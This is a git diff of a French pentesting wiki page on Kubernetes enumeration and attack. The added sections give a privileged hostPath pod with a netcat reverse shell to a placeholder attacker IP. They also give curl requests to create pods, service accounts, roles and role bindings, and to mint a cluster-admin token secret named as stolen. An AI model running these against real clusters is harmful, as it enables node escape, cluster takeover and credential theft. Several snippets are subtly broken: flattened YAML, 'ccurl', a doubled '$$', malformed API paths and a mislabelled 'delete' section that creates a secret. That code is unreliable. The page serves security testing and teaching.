Translated ['src/pentesting-cloud/kubernetes-security/kubernetes-enumera

2026-02-05 03:16:37 -08:00 · 2025-01-22 09:51:29 +00:00
parent f109214b85
commit 21a3aa393a
2 changed files with 230 additions and 20 deletions
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -451,8 +451,8 @@
    - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md)
    - [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md)
    - [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md)
-    - [Az - MySQL](pentesting-cloud/azure-security/az-services/az-mysql-post-exploitation.md)
-    - [Az - PostgreSQL](pentesting-cloud/azure-security/az-services/az-postgresql-post-exploitation.md)
+    - [Az - MySQL](pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md)
+    - [Az - PostgreSQL](pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md)
    - [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md)
    - [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md)
    - [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md)
@@ -462,16 +462,16 @@
    - [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)
    - [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md)
    - [Az - Automation Accounts Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.md)
-    - [Az - Container Registry Privesc](pentesting-cloud/azure-security/az-services/az-container-registry-privesc.md)
-    - [Az - Container Instances Privesc](pentesting-cloud/azure-security/az-services/az-container-instances-privesc.md)
-    - [Az - CosmosDB Privesc](pentesting-cloud/azure-security/az-services/az-cosmosDB-privesc.md)
+    - [Az - Container Registry Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md)
+    - [Az - Container Instances Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.md)
+    - [Az - CosmosDB Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.md)
    - [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md)
      - [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md)
      - [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md)
    - [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md)
    - [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md)
-    - [Az - MySQL Privesc](pentesting-cloud/azure-security/az-services/az-mysql-privesc.md)
-    - [Az - PostgreSQL Privesc](pentesting-cloud/azure-security/az-services/az-postgresql-privesc.md)
+    - [Az - MySQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.md)
+    - [Az - PostgreSQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.md)
    - [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md)
    - [Az - Service Bus Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md)
    - [Az - Static Web App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md)
--- a/src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
@@ -6,7 +6,7 @@

 Si vous avez compromis l'accès à une machine, l'utilisateur peut avoir accès à une plateforme Kubernetes. Le token se trouve généralement dans un fichier pointé par la **var env `KUBECONFIG`** ou **dans `~/.kube`**.

-Dans ce dossier, vous pourriez trouver des fichiers de configuration avec **tokens et configurations pour se connecter au serveur API**. Dans ce dossier, vous pouvez également trouver un dossier de cache avec des informations précédemment récupérées.
+Dans ce dossier, vous pourriez trouver des fichiers de configuration avec **des tokens et des configurations pour se connecter au serveur API**. Dans ce dossier, vous pouvez également trouver un dossier de cache avec des informations récupérées précédemment.

 Si vous avez compromis un pod dans un environnement Kubernetes, il existe d'autres endroits où vous pouvez trouver des tokens et des informations sur l'environnement K8 actuel :

@@ -19,7 +19,7 @@ Extrait de la [documentation](https://kubernetes.io/docs/tasks/configure-pod-con
 _“Lorsque vous créez un pod, si vous ne spécifiez pas de compte de service, il se voit automatiquement attribuer le_ compte de service _par défaut dans le même namespace.”_

 **ServiceAccount** est un objet géré par Kubernetes et utilisé pour fournir une identité aux processus qui s'exécutent dans un pod.\
-Chaque compte de service a un secret qui lui est associé et ce secret contient un token porteur. C'est un JSON Web Token (JWT), une méthode pour représenter des revendications de manière sécurisée entre deux parties.
+Chaque compte de service a un secret qui lui est associé et ce secret contient un token d'accès. C'est un JSON Web Token (JWT), une méthode pour représenter des revendications de manière sécurisée entre deux parties.

 Généralement, **un** des répertoires :

@@ -35,7 +35,7 @@ contient les fichiers :

 Maintenant que vous avez le token, vous pouvez trouver le serveur API dans la variable d'environnement **`KUBECONFIG`**. Pour plus d'infos, exécutez `(env | set) | grep -i "kuber|kube`**`"`**

-Le token de compte de service est signé par la clé résidant dans le fichier **sa.key** et validé par **sa.pub**.
+Le token du compte de service est signé par la clé résidant dans le fichier **sa.key** et validé par **sa.pub**.

 Emplacement par défaut sur **Kubernetes** :

@@ -63,7 +63,7 @@ Si vous ne savez pas ce qu'est **RBAC**, **lisez cette section**.
 Pour énumérer un environnement K8s, vous avez besoin de quelques éléments :

 - Un **token d'authentification valide**. Dans la section précédente, nous avons vu où chercher un token utilisateur et un token de compte de service.
- L'**adresse (**_**https://host:port**_**) de l'API Kubernetes**. Cela peut généralement être trouvé dans les variables d'environnement et/ou dans le fichier kube config.
+- L'**adresse (**_**https://host:port**_**) de l'API Kubernetes**. Cela peut généralement être trouvé dans les variables d'environnement et/ou dans le fichier de configuration kube.
 - **Optionnel** : Le **ca.crt pour vérifier le serveur API**. Cela peut être trouvé aux mêmes endroits que le token. Cela est utile pour vérifier le certificat du serveur API, mais en utilisant `--insecure-skip-tls-verify` avec `kubectl` ou `-k` avec `curl`, vous n'en aurez pas besoin.

 Avec ces détails, vous pouvez **énumérer Kubernetes**. Si l'**API** est accessible pour une raison quelconque via l'**Internet**, vous pouvez simplement télécharger ces informations et énumérer la plateforme depuis votre hôte.
@@ -91,7 +91,7 @@ GET /apis/apps/v1/watch/namespaces/{namespace}/deployments/{name}  [DEPRECATED]
 GET /apis/apps/v1/watch/namespaces/{namespace}/deployments  [DEPRECATED]
 GET /apis/apps/v1/watch/deployments  [DEPRECATED]
 ```
-Ils ouvrent une connexion de streaming qui vous renvoie le manifeste complet d'un Déploiement chaque fois qu'il change (ou lorsqu'un nouveau est créé).
+Ils ouvrent une connexion de streaming qui vous renvoie le manifeste complet d'un Deployment chaque fois qu'il change (ou lorsqu'un nouveau est créé).

 > [!CAUTION]
 > Les commandes `kubectl` suivantes indiquent simplement comment lister les objets. Si vous souhaitez accéder aux données, vous devez utiliser `describe` au lieu de `get`.
@@ -119,7 +119,7 @@ Par défaut, l'APISERVER communique avec le schéma `https://`
 ```bash
 alias k='kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-verify=true [--all-namespaces]' # Use --all-namespaces to always search in all namespaces
 ```
-> si pas de `https://` dans l'URL, vous pouvez obtenir une erreur comme Bad Request.
+> si pas de `https://` dans l'URL, vous pourriez obtenir une erreur comme Bad Request.

 Vous pouvez trouver un [**cheat sheet kubectl officiel ici**](https://kubernetes.io/docs/reference/kubectl/cheatsheet/). L'objectif des sections suivantes est de présenter de manière ordonnée différentes options pour énumérer et comprendre le nouveau K8s auquel vous avez obtenu accès.

@@ -266,7 +266,7 @@ kurl -v https://$APISERVER/api/v1/namespaces/custnamespace/secrets/
 {{#endtab }}
 {{#endtabs }}

-Si vous pouvez lire les secrets, vous pouvez utiliser les lignes suivantes pour obtenir les privilèges liés à chaque jeton :
+Si vous pouvez lire des secrets, vous pouvez utiliser les lignes suivantes pour obtenir les privilèges associés à chaque jeton :
 ```bash
 for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done
 ```
@@ -309,7 +309,7 @@ kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/deployments/

 ### Obtenir des Pods

-Les Pods sont les **conteneurs** réels qui vont **s'exécuter**.
+Les Pods sont les **conteneurs** qui vont **s'exécuter**.

 {{#tabs }}
 {{#tab name="kubectl" }}
@@ -328,7 +328,7 @@ kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/

 ### Obtenir des services

-Les **services** Kubernetes sont utilisés pour **exposer un service sur un port et une IP spécifiques** (qui agira comme un équilibreur de charge pour les pods qui offrent réellement le service). Il est intéressant de savoir où vous pouvez trouver d'autres services à essayer d'attaquer.
+Kubernetes **services** sont utilisés pour **exposer un service sur un port et une IP spécifiques** (qui agira comme un équilibreur de charge pour les pods qui offrent réellement le service). Il est intéressant de savoir où vous pouvez trouver d'autres services à essayer d'attaquer.

 {{#tabs }}
 {{#tab name="kubectl" }}
@@ -420,7 +420,7 @@ kurl -v https://$APISERVER/api/v1/namespaces/${NAMESPACE}/configmaps
 ### Obtenir des politiques réseau / Politiques réseau Cilium

 {{#tabs }}
-{{#tab name="Premier Onglet" }}
+{{#tab name="Premier onglet" }}
 ```bash
 k get networkpolicies
 k get CiliumNetworkPolicies
@@ -459,6 +459,10 @@ k top pod --all-namespaces
 {{#endtab }}
 {{#endtabs }}

+## Interagir avec le cluster sans utiliser kubectl
+
+Étant donné que le plan de contrôle Kubernetes expose une API REST-ful, vous pouvez créer des requêtes HTTP manuellement et les envoyer avec d'autres outils, tels que **curl** ou **wget**.
+
 ### Évasion du pod

 Si vous êtes capable de créer de nouveaux pods, vous pourriez être en mesure de vous échapper d'eux vers le nœud. Pour ce faire, vous devez créer un nouveau pod en utilisant un fichier yaml, passer au pod créé, puis chroot dans le système du nœud. Vous pouvez utiliser des pods déjà existants comme référence pour le fichier yaml, car ils affichent des images et des chemins existants.
@@ -469,7 +473,7 @@ kubectl get pod <name> [-n <namespace>] -o yaml
 >
 > `k get nodes --show-labels`
 >
-> En général, kubernetes.io/hostname et node-role.kubernetes.io/master sont de bonnes étiquettes pour la sélection.
+> En général, kubernetes.io/hostname et node-role.kubernetes.io/master sont de bonnes étiquettes à sélectionner.

 Ensuite, vous créez votre fichier attack.yaml
 ```yaml
@@ -505,7 +509,7 @@ Après cela, vous créez le pod
 ```bash
 kubectl apply -f attacker.yaml [-n <namespace>]
 ```
-Vous pouvez maintenant passer au pod créé comme suit
+Maintenant, vous pouvez passer au pod créé comme suit
 ```bash
 kubectl exec -it attacker-pod [-n <namespace>] -- sh # attacker-pod is the name defined in the yaml file
 ```
@@ -513,8 +517,214 @@ Et enfin, vous chrootez dans le système du nœud.
 ```bash
 chroot /root /bin/bash
 ```
-Informations obtenues à partir de : [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
+Information obtenue à partir de : [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)

+### Création d'un pod privilégié
+
+Le fichier yaml correspondant est le suivant :
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+name: everything-allowed-exec-pod
+labels:
+app: pentest
+spec:
+hostNetwork: true
+hostPID: true
+hostIPC: true
+containers:
+- name: everything-allowed-pod
+image: alpine
+securityContext:
+privileged: true
+volumeMounts:
+- mountPath: /host
+name: noderoot
+command: [ "/bin/sh", "-c", "--" ]
+args: [ "nc <ATTACKER_IP> <ATTACKER_PORT> -e sh" ]
+#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
+volumes:
+- name: noderoot
+hostPath:
+path: /
+```
+Créer le pod avec curl :
+```bash
+CONTROL_PLANE_HOST=""
+TOKEN=""
+
+curl --path-as-is -i -s -k -X $'POST' \
+-H "Host: $CONTROL_PLANE_HOST" \
+-H "Authorization: Bearer $TOKEN" \
+-H $'Accept: application/json' \
+-H $'Content-Type: application/json' \
+-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
+-H $'Content-Length: 478' \
+-H $'Accept-Encoding: gzip, deflate, br' \
+--data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"labels\":{\"app\":\"pentest\"},\"name\":\"everything-allowed-exec-pod\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"args\":[\"nc <ATTACKER_IP> <ATTACKER_PORT> -e sh\"],\"command\":[\"/bin/sh\",\"-c\",\"--\"],\"image\":\"alpine\",\"name\":\"everything-allowed-pod\",\"securityContext\":{\"privileged\":true},\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"noderoot\"}]}],\"hostIPC\":true,\"hostNetwork\":true,\"hostPID\":true,\"volumes\":[{\"hostPath\":{\"path\":\"/\"},\"name\":\"noderoot\"}]}}\x0a' \
+"https://$CONTROL_PLANE_HOST/api/v1/namespaces/default/pods?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
+```
+### Supprimer un pod
+
+Supprimer un pod avec curl :
+```bash
+CONTROL_PLANE_HOST=""
+TOKEN=""
+POD_NAME="everything-allowed-exec-pod"
+
+curl --path-as-is -i -s -k -X $'DELETE' \
+-H "Host: $CONTROL_PLANE_HOST" \
+-H "Authorization: Bearer $TOKEN" \
+-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
+-H $'Accept: application/json' \
+-H $'Content-Type: application/json' \
+-H $'Content-Length: 35' \
+-H $'Accept-Encoding: gzip, deflate, br' \
+--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
+"https://$CONTROL_PLANE_HOST/api/v1/namespaces/default/pods/$POD_NAME"
+```
+### Créer un compte de service
+```bash
+CONTROL_PLANE_HOST=""
+TOKEN=""
+NAMESPACE="default"
+
+
+curl --path-as-is -i -s -k -X $'POST' \
+-H "Host: $CONTROL_PLANE_HOST" \
+-H "Authorization: Bearer $TOKEN" \
+-H $'Content-Type: application/json' \
+-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
+-H $'Accept: application/json' \
+-H $'Content-Length: 109' \
+-H $'Accept-Encoding: gzip, deflate, br' \
+--data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"ServiceAccount\",\"metadata\":{\"name\":\"secrets-manager-sa-2\",\"namespace\":\"default\"}}\x0a' \
+"https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/serviceaccounts?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
+```
+### Supprimer un compte de service
+```bash
+CONTROL_PLANE_HOST=""
+TOKEN=""
+SA_NAME=""
+NAMESPACE="default"
+
+curl --path-as-is -i -s -k -X $'DELETE' \
+-H "Host: $CONTROL_PLANE_HOST" \
+-H "Authorization: Bearer $TOKEN" \
+-H $'Accept: application/json' \
+-H $'Content-Type: application/json' \
+-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
+-H $'Content-Length: 35' -H $'Accept-Encoding: gzip, deflate, br' \
+--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
+"https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/serviceaccounts/$SA_NAME"
+```
+### Créer un rôle
+```bash
+CONTROL_PLANE_HOST=""
+TOKEN=""
+NAMESPACE="default"
+
+
+curl --path-as-is -i -s -k -X $'POST' \
+-H "Host: $CONTROL_PLANE_HOST" \
+-H "Authorization: Bearer $TOKEN" \
+-H $'Content-Type: application/json' \
+-H $'Accept: application/json' \
+-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
+-H $'Content-Length: 203' \
+-H $'Accept-Encoding: gzip, deflate, br' \
+--data-binary $'{\"apiVersion\":\"rbac.authorization.k8s.io/v1\",\"kind\":\"Role\",\"metadata\":{\"name\":\"secrets-manager-role\",\"namespace\":\"default\"},\"rules\":[{\"apiGroups\":[\"\"],\"resources\":[\"secrets\"],\"verbs\":[\"get\",\"create\"]}]}\x0a' \
+"https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/roles?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
+```
+### Supprimer un rôle
+```bash
+CONTROL_PLANE_HOST=""
+TOKEN=""
+NAMESPACE="default"
+ROLE_NAME=""
+
+curl --path-as-is -i -s -k -X $'DELETE' \
+-H "Host: $CONTROL_PLANE_HOST" \
+-H "Authorization: Bearer $TOKEN" \
+-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
+-H $'Accept: application/json' \
+-H $'Content-Type: application/json' \
+-H $'Content-Length: 35' \
+-H $'Accept-Encoding: gzip, deflate, br' \
+--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
+"https://$$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/roles/$ROLE_NAME"
+```
+### Créer un lien de rôle
+```bash
+CONTROL_PLANE_HOST=""
+TOKEN=""
+NAMESPACE="default"
+
+curl --path-as-is -i -s -k -X $'POST' \
+-H "Host: $CONTROL_PLANE_HOST" \
+-H "Authorization: Bearer $TOKEN" \
+-H $'Accept: application/json' \
+-H $'Content-Type: application/json' \
+-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
+-H $'Content-Length: 816' \
+-H $'Accept-Encoding: gzip, deflate, br' \
+--data-binary $'{\"apiVersion\":\"rbac.authorization.k8s.io/v1\",\"kind\":\"RoleBinding\",\"metadata\":{\"name\":\"secrets-manager-role-binding\",\"namespace\":\"default\"},\"roleRef\":{\"apiGroup\":\"rbac.authorization.k8s.io\",\"kind\":\"Role\",\"name\":\"secrets-manager-role\"},\"subjects\":[{\"apiGroup\":\"\",\"kind\":\"ServiceAccount\",\"name\":\"secrets-manager-sa\",\"namespace\":\"default\"}]}\x0a' \
+"https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/$NAMESPACE/default/rolebindings?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
+```
+### Supprimer un lien de rôle
+```bash
+CONTROL_PLANE_HOST=""
+TOKEN=""
+NAMESPACE="default"
+ROLE_BINDING_NAME=""
+
+curl --path-as-is -i -s -k -X $'DELETE' \
+-H "Host: $CONTROL_PLANE_HOST" \
+-H "Authorization: Bearer $TOKEN" \
+-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
+-H $'Accept: application/json' \
+-H $'Content-Type: application/json' \
+-H $'Content-Length: 35' \
+-H $'Accept-Encoding: gzip, deflate, br' \
+--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
+"https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/rolebindings/$ROLE_BINDING_NAME"
+```
+### Supprimer un Secret
+```bash
+CONTROL_PLANE_HOST=""
+TOKEN=""
+NAMESPACE="default"
+
+curl --path-as-is -i -s -k -X $'POST' \
+-H "Host: $CONTROL_PLANE_HOST" \
+-H "Authorization: Bearer $TOKEN" \
+-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
+-H $'Accept: application/json' \
+-H $'Content-Type: application/json' \
+-H $'Content-Length: 219' \
+-H $'Accept-Encoding: gzip, deflate, br' \
+--data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"Secret\",\"metadata\":{\"annotations\":{\"kubernetes.io/service-account.name\":\"cluster-admin-sa\"},\"name\":\"stolen-admin-sa-token\",\"namespace\":\"default\"},\"type\":\"kubernetes.io/service-account-token\"}\x0a' \
+"https://$CONTROL_PLANE_HOST/api/v1/$NAMESPACE/default/secrets?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
+```
+### Supprimer un Secret
+```bash
+CONTROL_PLANE_HOST=""
+TOKEN=""
+NAMESPACE="default"
+SECRET_NAME=""
+
+ccurl --path-as-is -i -s -k -X $'DELETE' \
+-H "Host: $CONTROL_PLANE_HOST" \
+-H "Authorization: Bearer $TOKEN" \
+-H $'Content-Type: application/json' \
+-H $'Accept: application/json' \
+-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
+-H $'Content-Length: 35' \
+-H $'Accept-Encoding: gzip, deflate, br' \
+--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
+"https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/secrets/$SECRET_NAME"
+```
 ## Références

 {{#ref}}